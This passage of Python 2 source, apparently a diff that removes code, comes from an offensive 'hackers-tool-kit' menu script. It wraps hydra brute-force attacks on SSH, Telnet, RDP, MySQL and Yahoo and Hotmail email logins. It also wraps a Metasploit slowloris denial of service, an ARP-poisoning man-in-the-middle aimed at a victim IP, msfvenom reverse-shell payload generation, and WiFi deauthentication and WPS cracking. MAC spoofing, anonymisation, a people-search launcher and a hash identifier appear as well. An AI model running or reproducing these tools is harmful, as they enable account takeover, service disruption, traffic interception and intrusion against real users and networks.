os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') - os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) - os.system('echo "run\n" >> handler.rc') - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 